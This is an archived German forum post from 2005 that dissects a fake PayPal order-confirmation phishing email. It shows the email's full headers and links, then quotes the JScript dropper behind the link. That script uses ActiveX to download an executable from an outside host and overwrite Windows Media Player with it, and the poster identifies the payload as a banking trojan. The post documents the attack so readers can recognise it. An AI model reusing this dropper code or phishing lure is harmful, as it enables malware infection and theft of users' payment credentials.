PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Online-Rechnung: Paypal



KyroxX
30.01.2005, 14:09
Hallo zusammen:
Nachricht:
From - Sun Jan 30 xx:xx:xx 2005
X-Account-Key: account2
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <piteshman [at] shop.com>
Delivered-To: *********@dd2004.kasserver.com
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
by dd2004.kasserver.com (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 29 Jan 2005 xx:xx:xx +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
by UserMail1.FreeCity.De (Postfix) with SMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 29 Jan 2005 xx:xx:xx +0100 (CET)
X-Message-Info: V/km+3+td/F+42/444321127952331
Received: from smtp-credenza.areaway.piteshman [at] shop.com ([]) by g270-wvi9.piteshman [at] shop.com with Microsoft SMTPSVC(5.0.5203.4611);
Sun, 30 Jan 2005 xx:xx:xx -0500
Received: from smtp-pensive.florid.piteshman [at] shop.com ([]) by bv57-cg32.piteshman [at] shop.com with Microsoft SMTPSVC(5.0.2333.6235);
Sun, 30 Jan 2005 xx:xx:xx +0400
X-Message-Info: NCDZ+%ND_LC_CHAR[1-3]7+ie+NDW+482/198368156710
Received: (qmail 41314 invoked by UID: [UID filtered]
Date: Sun, 30 Jan 2005 xx:xx:xx -0700
Message-ID: [ID filtered]
From: PayPal Support <piteshman [at] shop.com>
To: Info <poor [at] spamvictim.tld>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0 (produced by francesanew 7.4)
Content-Type: multipart/alternative;
boundary="--206346472488856940"
X-UIDL: [UID filtered]
----206346472488856940
Content-Type: text/html;
charset="iso-5877-2"
Content-Transfer-Encoding: 7Bit
Content-Description: cicada avocet alkaloid
Sony DSC-F828 8.0MP Digital Camera<br><br>

Your order # 12405 has been accepted for the amount 840.00$ <br>
Your card will be charged in that amount .Thank you for your purchase.<br><br><br>


You can check the order in your profile. <br><br>
http://jeysiksnet.net (<a href=)">http://jeysiksnet.net (http://jeysiksnet.net</a>)</a>;
----206346472488856940--
Bei link wird eine Iframe geladen, welche die javascript_loader.js bei redirect auf eine seite öffnet.
Diese wiederum öffnet die shellcode.js aus. Code:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://jeysiksnet.netfirms.com/demo.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";
habe die demo.exe analysiert:
TrojanSpy.Win32.Banker.bq
vermutlich loggt er die Zugansdaten zu PayPal mit und sendet sie nach hause.
Grüße